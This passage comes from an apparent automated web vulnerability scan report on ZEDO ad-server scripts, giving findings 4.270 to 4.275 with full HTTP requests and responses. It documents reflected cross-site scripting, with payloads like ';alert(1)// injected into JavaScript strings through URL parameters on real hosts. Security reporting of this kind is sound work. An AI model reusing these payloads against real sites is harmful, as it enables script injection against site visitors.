Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2859792649
Cache-Control: max-age=2592000
Expires: Mon, 28 Feb 2011 01:59:29 GMT
Date: Sat, 29 Jan 2011 01:59:29 GMT
Connection: close
Content-Length: 4711


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
== 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002ed1e4";99b30bf642b;i=0;n=951;s=2;" + zzStr;


function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1);
   var zzNS7 =
...[SNIP]...

4.270. http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://d3.zedo.com
Path:   //ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8690"%3b12f58dba9e6 was submitted in the REST URL parameter 9. This input was echoed as e8690";12f58dba9e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //ads2/k/602889/3869/172/0/951000002/951000002/0e8690"%3b12f58dba9e6/951/2//1000014/i.js HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=15;w=1;h=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
Content-Type: application/x-javascript
X-Varnish: 2859792980
Cache-Control: max-age=2591961
Expires: Mon, 28 Feb 2011 01:58:51 GMT
Date: Sat, 29 Jan 2011 01:59:30 GMT
Connection: close
Content-Length: 4711


var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd =='undefined'){var zzIdxTrd ='';}
el
...[SNIP]...
0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

var zzLogData ="a=602889;x=3869;g=172,0;c=951000002,951000002;i=0e8690";12f58dba9e6;n=951;s=2;" + zzStr;


function zzPop() {
   var zzAg = navigator.userAgent.toLowerCase();
   var zzAOL = (zzAg.indexOf('aol') != -1);
   var zzNS6 = (zzAg.indexOf('netscape6/6.') != -1);
   var zzNS7 = (zzA
...[SNIP]...

4.271. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58993'%3balert(1)//9d587b5b16b was submitted in the $ parameter. This input was echoed as 58993';alert(1)//9d587b5b16b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=58993'%3balert(1)//9d587b5b16b&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:58993';alert(1)//9d587b5b16b;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:11 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=190
Expires: Sat, 29 Jan 2011 02:03:21 GMT
Date: Sat, 29 Jan 2011 02:00:11 GMT
Connection: close
Content-Length: 2283

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',58993';alert(1)//9d587b5b16b';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,58993';alert(1)//9d587b5b16b;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.272. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea250"%3balert(1)//213da1d65d4 was submitted in the $ parameter. This input was echoed as ea250";alert(1)//213da1d65d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=ea250"%3balert(1)//213da1d65d4&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:ea250";alert(1)//213da1d65d4;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:08 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=193
Expires: Sat, 29 Jan 2011 02:03:21 GMT
Date: Sat, 29 Jan 2011 02:00:08 GMT
Connection: close
Content-Length: 2283

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',ea250";alert(1)//213da1d65d4';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,ea250";alert(1)//213da1d65d4;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


...[SNIP]...

4.273. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c159a'-alert(1)-'63e58f5998c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c159a'-alert(1)-'63e58f5998c=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFad=32:15:42:23:13:18:2:1:1:0; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:29,26,1:21,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFcat=826,187,14:951,11,14:826,187,9:951,7,9:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 964
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:826,187,14:951,11,14:826,187,9:951,7,9:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:32:15:42:23:13:18:2:1:1:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=261
Expires: Sat, 29 Jan 2011 05:30:36 GMT
Date: Sat, 29 Jan 2011 05:26:15 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fm.js;qs=c159a'-alert(1)-'63e58f5998c=1;';


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='None,4f791'';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=None,4f791';z
...[SNIP]...

4.274. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77514'%3balert(1)//51b4eb1c0b8 was submitted in the q parameter. This input was echoed as 77514';alert(1)//51b4eb1c0b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=77514'%3balert(1)//51b4eb1c0b8&$=&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:00 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=202
Expires: Sat, 29 Jan 2011 02:03:22 GMT
Date: Sat, 29 Jan 2011 02:00:00 GMT
Connection: close
Content-Length: 2280

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='77514';alert(1)//51b4eb1c0b8';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=77514';alert(1)//51b4eb1c0b8;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

4.275. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e84a"%3balert(1)//8ca396aaf64 was submitted in the q parameter. This input was echoed as 3e84a";alert(1)//8ca396aaf64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=3e84a"%3balert(1)//8ca396aaf64&$=&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 01:59:57 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=205
Expires: Sat, 29 Jan 2011 02:03:22 GMT
